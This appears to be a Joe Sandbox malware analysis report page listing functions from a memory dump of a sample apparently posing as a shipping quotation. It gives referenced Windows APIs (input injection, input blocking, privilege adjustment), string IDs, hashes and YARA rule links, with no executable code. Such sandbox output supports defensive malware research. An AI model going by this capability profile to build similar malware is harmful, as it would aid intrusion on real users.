                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID: X64
                                                                            • API String ID: 2645101109-893830106
                                                                            • Opcode ID: 86559c9116330f4830d089c26f1ae2c3caacfe4312e1216b294946486cbfd94b
                                                                            • Instruction ID: c44b57c11e91a3507c5745e19f917f739eb5226ceda83fd5655943bb9182de2e
                                                                            • Opcode Fuzzy Hash: 86559c9116330f4830d089c26f1ae2c3caacfe4312e1216b294946486cbfd94b
                                                                            • Instruction Fuzzy Hash: 69D0CAB480112DEACB90DBA0EC88DEAB3BDBB04315F100292F20AA2040DB30964A9F20
                                                                            Function 0063CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Variable is not of type 'Object'.$p#p
                                                                            • API String ID: 0-30852625
                                                                            • Opcode ID: 223fa9e1a616ba1122937e9257557427b20132c2f681f067a5f1a02efb09543e
                                                                            • Instruction ID: 31da532aaf3a73e9205265478759446f49a50c5431f3fb175a67e61a3e04a0d1
                                                                            • Opcode Fuzzy Hash: 223fa9e1a616ba1122937e9257557427b20132c2f681f067a5f1a02efb09543e
                                                                            • Instruction Fuzzy Hash: F8329A74900218DBDF54EF94C885AEDB7B6BF04314F148559F806BB392DB35AE4ACBA0
                                                                            Function 006A68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006A6918
                                                                            • FindClose.KERNEL32(00000000), ref: 006A6961
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: 6c6d41885a24a09d7ed314eb08f2106dd06f875b74152ee66e9ba5a175bc4c5d
                                                                            • Instruction ID: 7b72781c792d83b889bba65911e5b17b25387c427b6263b0e730c7e03a2ed717
                                                                            • Opcode Fuzzy Hash: 6c6d41885a24a09d7ed314eb08f2106dd06f875b74152ee66e9ba5a175bc4c5d
                                                                            • Instruction Fuzzy Hash: 0C117F756042019FC710DF29D484A16BBE6EF85328F18C69DF4698B7A2CB34EC05CB91
                                                                            Function 006A37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,006B4891,?,?,00000035,?), ref: 006A37E4
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,006B4891,?,?,00000035,?), ref: 006A37F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 22fccc379b1bd61d8be2b5e577e44fbc6d595e2918c3ccbe7bf09a51814969ad
                                                                            • Instruction ID: 62266579c2929837fed518eb25a5ebde1b04df6377ad3db22863d4d37d03767b
                                                                            • Opcode Fuzzy Hash: 22fccc379b1bd61d8be2b5e577e44fbc6d595e2918c3ccbe7bf09a51814969ad
                                                                            • Instruction Fuzzy Hash: 77F0E5B16043282AE76067669C4DFEB3AAFEFC6771F000165F50DD2281D9A09D44CAB4
                                                                            Function 0069B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0069B25D
                                                                            • keybd_event.USER32(?,772EA2E0,?,00000000), ref: 0069B270
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: InputSendkeybd_event
                                                                            • String ID:
                                                                            • API String ID: 3536248340-0
                                                                            • Opcode ID: 2c50d5b5ab4baec2e90383179be697e87d29fc3f1b32903d775f1de7e34a6251
                                                                            • Instruction ID: 6c19522dfa1e990bdaf46c950c2807d6c659f7f058bd6ee825c7d5b18600f41d
                                                                            • Opcode Fuzzy Hash: 2c50d5b5ab4baec2e90383179be697e87d29fc3f1b32903d775f1de7e34a6251
                                                                            • Instruction Fuzzy Hash: F5F01D7180424DABDF059FA0D805BFE7BB5FF04315F00901AF955A5191C37996119F94
                                                                            Function 006910BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006911FC), ref: 006910D4
                                                                            • CloseHandle.KERNEL32(?,?,006911FC), ref: 006910E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            • Opcode ID: 66f33a39b7e42b3626710c7735acd9696879843b2a4cd4b607935645986f1407
                                                                            • Instruction ID: 55b4578ca68ec749521e6b29ce1951f4eec6be1c7c100ab1d8ae2d9044146fbc
                                                                            • Opcode Fuzzy Hash: 66f33a39b7e42b3626710c7735acd9696879843b2a4cd4b607935645986f1407
                                                                            • Instruction Fuzzy Hash: F8E04F32004600AEE7252B11FC05E737BAAEF04320B24882DF4AA804B1DB626C90DB14
                                                                            Function 0063BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: p#p
                                                                            • API String ID: 3964851224-1159509791
                                                                            • Opcode ID: 35957c17c70294815fa9e592200324a7dde06ad1958eabb9fac3c56cd20b8561
                                                                            • Instruction ID: 0d2cfddfaa8c186f408fa32410ed67acf96652b353f261ffeaf68e70ad9b9984
                                                                            • Opcode Fuzzy Hash: 35957c17c70294815fa9e592200324a7dde06ad1958eabb9fac3c56cd20b8561
                                                                            • Instruction Fuzzy Hash: F2A26970A083019FD764DF18C480B6ABBE2BF89314F14896DF89A9B352D771EC45CB92
                                                                            Function 0066676B Relevance: 1.8, APIs: 1, Instructions: 269COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00666766,?,?,00000008,?,?,0066FEFE,00000000), ref: 00666998
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3997070919-0
                                                                            • Opcode ID: c890714334a4def127d4f45537309f9612e71027601baa12bb5031e81f6ba51a
                                                                            • Instruction ID: f6fa20924947463ee1f935c0a3fc54afd5857e8393062139d414c6ac90d08c07
                                                                            • Opcode Fuzzy Hash: c890714334a4def127d4f45537309f9612e71027601baa12bb5031e81f6ba51a
                                                                            • Instruction Fuzzy Hash: B9B15B316106099FD715CF28D48ABA57BE2FF45364F25865CF89ACF2A2C335E982CB40
                                                                            Function 0064B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 26dcfff8deeec5d17401768004d0077ce4d9c8928149e78ef3750a9ec46dbfb8
                                                                            • Instruction ID: dbb9db26788adfec4f7337a12b6e2c0b66e364e2ed7e5481bad0d65b68812a4b
                                                                            • Opcode Fuzzy Hash: 26dcfff8deeec5d17401768004d0077ce4d9c8928149e78ef3750a9ec46dbfb8
                                                                            • Instruction Fuzzy Hash: D51260719002299FCB64DF98C8816EEB7F6FF48710F54819AE849EB255DB349E81CF90
                                                                            Function 00650698 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006506B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor
                                                                            • String ID:
                                                                            • API String ID: 2325560087-0
                                                                            • Opcode ID: 81aeca249494b2292b3b88462479bdae8c32344458426ff8a8929cc145b2ce7c
                                                                            • Instruction ID: 2c03451385b5b638250752c4fd94cee88a6ababfdb6917a4389fa3ffd3913934
                                                                            • Opcode Fuzzy Hash: 81aeca249494b2292b3b88462479bdae8c32344458426ff8a8929cc145b2ce7c
                                                                            • Instruction Fuzzy Hash: 68416D71901205CBEB14CF58D9C5BAABBF5FB48321F24916AD805EB350D778E949CF90
                                                                            Function 00651394 Relevance: 1.6, Strings: 1, Instructions: 356COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: b(j
                                                                            • API String ID: 0-1143529648
                                                                            • Opcode ID: b6e6e98122f4031bcdaaf0a6658600cf67a82743fa775ab266a6aefbbe5bbd7f
                                                                            • Instruction ID: f0ea0d5749ff664da26346d311a78f45d7cffea045276a9f04b8979cb482c3a0
                                                                            • Opcode Fuzzy Hash: b6e6e98122f4031bcdaaf0a6658600cf67a82743fa775ab266a6aefbbe5bbd7f
                                                                            • Instruction Fuzzy Hash: 9ED1D6721081A30ACB2D4A3984701BABFE26A53363B1D439DDCF7CE6C2ED24D95DD660
                                                                            Function 006AEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 006AEABD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            • Opcode ID: fb38149ddfcbba8080c81f87db5e7db74164d5b0a80edc5d254093b51151fb0c
                                                                            • Instruction ID: 7161d6821cb58be51cd47f9d529ba0b4b2010dcac60ad1a44a2ebbc644c0cd3f
                                                                            • Opcode Fuzzy Hash: fb38149ddfcbba8080c81f87db5e7db74164d5b0a80edc5d254093b51151fb0c
                                                                            • Instruction Fuzzy Hash: E9E01A362002049FC710EF5AD804E9AB7EAAF99770F00841AFD49DB351DA71AC418B90
                                                                            Function 006509D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,006503EE), ref: 006509DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 686c81985f017fb1e25badaf16a2006008a5359dc85a356d3c6c71ac8ce1930a
                                                                            • Instruction ID: 77a226791a44e208a7140c123c9f26d676dd599d9c70aff9223e11900a5510db
                                                                            • Opcode Fuzzy Hash: 686c81985f017fb1e25badaf16a2006008a5359dc85a356d3c6c71ac8ce1930a
                                                                            • Instruction Fuzzy Hash:
                                                                            Function 0065781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0
                                                                            • API String ID: 0-4108050209
                                                                            • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                            • Instruction ID: d23b7b77322a9305e16b42764d9a0a3d73d24158059411cb44c55e3c2bef5d21
                                                                            • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                            • Instruction Fuzzy Hash: C3518B7161C7055BDB388568B85D7FE638B9B12303F18052EDC82D7782CA15EE0ED36A
                                                                            Function 006A2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0&p
                                                                            • API String ID: 0-1223806618
                                                                            • Opcode ID: d3c38111ef881a3099e0e8c7b45a58cd46f41db91b859377ca6bee7aecea5762
                                                                            • Instruction ID: 513c864fbd48db3ffdaee5d3d25c76a1c18fc802c6c2e2947b5bea8cd0c14ef5
                                                                            • Opcode Fuzzy Hash: d3c38111ef881a3099e0e8c7b45a58cd46f41db91b859377ca6bee7aecea5762
                                                                            • Instruction Fuzzy Hash: 8721BB326605118BD728CF79C82367E73E5A754310F15862EE4A7C37D1DE7AAD04CB84
                                                                            Function 00666DD9 Relevance: .6, Instructions: 637COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 29f0f091381353cb008fec1b346e71f247c6decc5bf8a4ae90bb1317535b4eec
                                                                            • Instruction ID: ff60b1ee2491632fa3c3a711706edea957f86731c8dbd0356c58fc34d9c48f0e
                                                                            • Opcode Fuzzy Hash: 29f0f091381353cb008fec1b346e71f247c6decc5bf8a4ae90bb1317535b4eec
                                                                            • Instruction Fuzzy Hash: F132F321D2AF424DD7239634D832335A78AAFB73D9F15D737E81AB5AA5EF29C4834100
                                                                            Function 0064CC39 Relevance: .6, Instructions: 635COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d9184158a167693b14b0fce408746b38bd639920b2a78a4a1147bacd2b964b48
                                                                            • Instruction ID: 9536410e947d8483c57790e0602e42f95e70f96a0ad55680483bb0af024981a5
                                                                            • Opcode Fuzzy Hash: d9184158a167693b14b0fce408746b38bd639920b2a78a4a1147bacd2b964b48
                                                                            • Instruction Fuzzy Hash: 67320631A001158BDF28EF29C4D46FD7BA3EF45330F28866AD95A9B791D230DD82DB61
                                                                            Function 00637920 Relevance: .6, Instructions: 563COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1e2d5c853e89ce33f6fb63b8c5dcb65ebcaac94536c97b2026997b089bab2048
                                                                            • Instruction ID: 0632a8bf3a6338f8261a7d38bf35dff989a460423af42d10d2612158f292ec2c
                                                                            • Opcode Fuzzy Hash: 1e2d5c853e89ce33f6fb63b8c5dcb65ebcaac94536c97b2026997b089bab2048
                                                                            • Instruction Fuzzy Hash: E522A0B0A0460ADFDF14CF64C881AEEB7F7FF44300F248569E816A7291EB75A915CB94
                                                                            Function 006391C0 Relevance: .5, Instructions: 475COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
